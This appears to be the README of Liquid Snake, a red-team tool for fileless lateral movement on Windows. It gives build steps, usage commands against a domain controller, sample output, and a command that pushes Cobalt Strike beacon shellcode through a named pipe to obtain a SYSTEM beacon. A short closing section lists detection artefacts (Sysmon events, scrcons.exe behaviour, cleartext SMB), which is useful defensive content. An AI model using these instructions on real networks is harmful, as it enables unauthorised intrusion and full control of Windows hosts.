Liquid Snake
Liquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk. The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.
The diagram below (hopefully) clarifies the flow of data:
Credits
- MDSec - WMI Event Subscription - this tool is merely an implementation of the concept described in this blog post, the code also relies on Dominic's WMI persistence C Sharp PoC
- pwndizzle - thread-hijack.cs - for inspiration on the thread hijacking implementation in C Sharp
- med0x2e - GadgetToJscript - for the monstrous work of creating GadgetToJScript
Intro
The project is composed by two separate solutions:
CSharpNamedPipeLoader
- the component that will be transformed in VBS via GadgetToJScriptLiquidSnake
- the component responsible to creating the WMI Event Subscription on the remote system
Building
Simply open both solutions in Visual Studio and build them. Make sure to target x64 architecture for the CSharpNamedPipeLoader
. If everything went fine, you should have two separate EXEs: CSharpNamedPipeLoader.exe and LiquidSnake.exe
Using GadgetToJscript, convert the CSharpNamedPipeLoader.exe
to VBS using the following command:
GadgetToJScript.exe -a CSharpNamedPipeLoader.exe -b -w vbs
Test the .NET deserialisation using cscript.exe
and ensure that everything works as expected:
cscript.exe test.vbs
Then, base64 encode the vbs file and stick it in the LiquidSnake's Program.cs vbscript64
variable at line 29.
I already made this for you so you can just compile the LiquidSnake solution and use it as it is.
Usage
Usage of this project is straightforward, use LiquidSnake.exe
agains a host where you have administrative access over as follows:
LiquidSnake.exe <host> [<username> <password> <domain>]
LiquidSnake.exe dc01.isengard.local
LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local
NOTE: Currently thers is a bug when you explicitly set user credentials, the tool will not work in that case. It is recommended to use make_token
or any other impersonation mechanism instead.
If everything went fine, you should obtain an output similar as the following:
[*] Event filter created.
[*] Event consumer created.
[*] Subscription created, now sleeping
[*] Sending some DCOM love..
[*] Sleeping again... long day
The example above uses CobaltStrike's execute-assembly
to launch LiquidSnake:
Meanwhile, in the remote host a new named pipe will be created with the following name:
\\.\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7
Then, using my send_shellcode_via_pipe
project from my BOFs you can send an arbitrary shellcode on the remote pipe that will be loaded and executed:
send_shellcode_via_pipe \\dc01\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 beacon.bin
If everything worked as expected, you should obtain a SYSTEM beacon:
NOTE: The current LiquidSnake version contains artefact generated by GadgetToJScript that targets .NET version 4.x. If your target host has only 3.5 installed, this will fail. Simply repeat the same process but using the appropriate .NET version when building GadgetToJScript.
Detection
There are many detection opportunities to identify the abuse of this tool and in general the use of this technique:
- Creation and deletion of a WMI Event Filter in a short period of time, see Sysmon event IDs 19, 20, 21, 22
- Module load events for
clr.dll
related to thescrcons.exe
process - Creation of a named pipe related to the
scrcons.exe
process
Additionally, the biggest drawback of the specific implementation is that the shellcode is sent in cleartext over SMB. Meaning that if a network monitor solution is able to inspect that traffic, it is likely that it will stand out. I haven't done much testing against zeek/bro ruleset but I am pretty confident that it will be picked up immediately.
In the detection-artefacts
folder I left the PCAP file of a Wireshark capture and the Sysmon events generated during the attack (using Swift On Security's default config).